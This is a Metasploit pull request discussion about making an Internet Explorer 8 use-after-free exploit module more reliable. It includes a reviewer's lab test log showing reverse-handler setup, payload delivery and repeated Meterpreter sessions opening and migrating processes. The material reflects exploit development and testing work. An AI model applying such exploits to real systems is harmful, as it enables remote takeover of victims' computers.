
A slight change for stability #1810

Merged
merged 1 commit into from May 9, 2013

Conversation

@wchen-r7 wchen-r7 (Contributor) commented May 9, 2013

While updating ie_cgenericelement_uaf earlier today, I noticed the changes made it a tiny bit less stable. Juan's test log in #1809 also kinda shows that (with the first attempt failing), so I decided to go back and move the string crafting part; that way, between CollectGarbage() and the overwrite, there is less noise, and hopefully it is more stable. I did a few tests; it seems better.

While updating ie_cgenericelement_uaf earlier today, I noticed the
changes made it a tiny bit less stable. Juan's test log in rapid7#1809
also kinda shows that (with the first attempt failing), so I decided
to go back and move the string crafting part, that way between
CollectGarbage() and the overwrite, there is less noise, and hopefully
more stable.  I did a few tests, seems better.
@jvazquez-r7 jvazquez-r7 (Contributor) commented

Testing again!

Results on Windows 7 / IE8

10 tries / 7 sessions, which is good enough for me to merge :) @wchen-r7, if you remember better results before adding support for use of the msf APIs, let me know and we can revert, but I guess there shouldn't be a difference in reliability terms.

[*] Started reverse handler on 192.168.0.6:4444 
[*] Using URL: http://0.0.0.0:8080/WzNfJajpCSdD17M
[*]  Local IP: http://192.168.0.6:8080/WzNfJajpCSdD17M
[*] Server started.
msf exploit(ie_cgenericelement_uaf) > [*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 1 opened (192.168.0.6:4444 -> 192.168.0.6:49651) at 2013-05-08 21:46:21 -0500
[*] Session ID 1 (192.168.0.6:4444 -> 192.168.0.6:49651) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3964)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2256
[+] Successfully migrated to process 
[*] 192.168.172.187 - Meterpreter session 1 closed.  Reason: Died
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 2 opened (192.168.0.6:4444 -> 192.168.0.6:49679) at 2013-05-08 21:46:53 -0500
[*] Session ID 2 (192.168.0.6:4444 -> 192.168.0.6:49679) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2444)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 584
[-] Could not migrate in to process.
[-] SSL_accept SYSCALL returned=5 errno=0 state=SSLv3 read client hello B
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 3 opened (192.168.0.6:4444 -> 192.168.0.6:49692) at 2013-05-08 21:47:11 -0500
[*] 192.168.172.187 - Meterpreter session 2 closed.  Reason: Died
[*] Session ID 3 (192.168.0.6:4444 -> 192.168.0.6:49692) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1940)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3916
[-] Could not migrate in to process.
[-] SSL_accept SYSCALL returned=5 errno=0 state=SSLv3 read client hello B
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 4 opened (192.168.0.6:4444 -> 192.168.0.6:49724) at 2013-05-08 21:47:33 -0500
[*] 192.168.172.187 - Meterpreter session 3 closed.  Reason: Died
[*] Session ID 4 (192.168.0.6:4444 -> 192.168.0.6:49724) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2672)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1804
[-] Could not migrate in to process.
[-] Broken pipe
[*] 192.168.172.187 - Meterpreter session 4 closed.  Reason: Died
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 5 opened (192.168.0.6:4444 -> 192.168.0.6:49753) at 2013-05-08 21:47:50 -0500
[*] Session ID 5 (192.168.0.6:4444 -> 192.168.0.6:49753) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3728)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4084
[-] Could not migrate in to process.
[-] SSL_accept SYSCALL returned=5 errno=0 state=SSLv3 read client hello B
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 6 opened (192.168.0.6:4444 -> 192.168.0.6:49789) at 2013-05-08 21:48:20 -0500
[*] Session ID 6 (192.168.0.6:4444 -> 192.168.0.6:49789) processing InitialAutoRunScript 'migrate -f'
[*] 192.168.172.187 - Meterpreter session 5 closed.  Reason: Died
[*] Current server process: iexplore.exe (3272)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2708
[+] Successfully migrated to process 
[*] 192.168.172.187 - Meterpreter session 6 closed.  Reason: Died
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] 192.168.0.6      ie_cgenericelement_uaf - Requesting: /WzNfJajpCSdD17M
[*] 192.168.0.6      ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.0.6      ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.6
[*] Meterpreter session 7 opened (192.168.0.6:4444 -> 192.168.0.6:49847) at 2013-05-08 21:49:22 -0500
[*] Session ID 7 (192.168.0.6:4444 -> 192.168.0.6:49847) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2444)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2652
[+] Successfully migrated to process 

jvazquez-r7 pushed a commit that referenced this pull request May 9, 2013
@jvazquez-r7 jvazquez-r7 merged commit 9043eed into rapid7:master May 9, 2013
@wchen-r7 wchen-r7 deleted the cve_2013_1347_update_2 branch August 22, 2016 16:24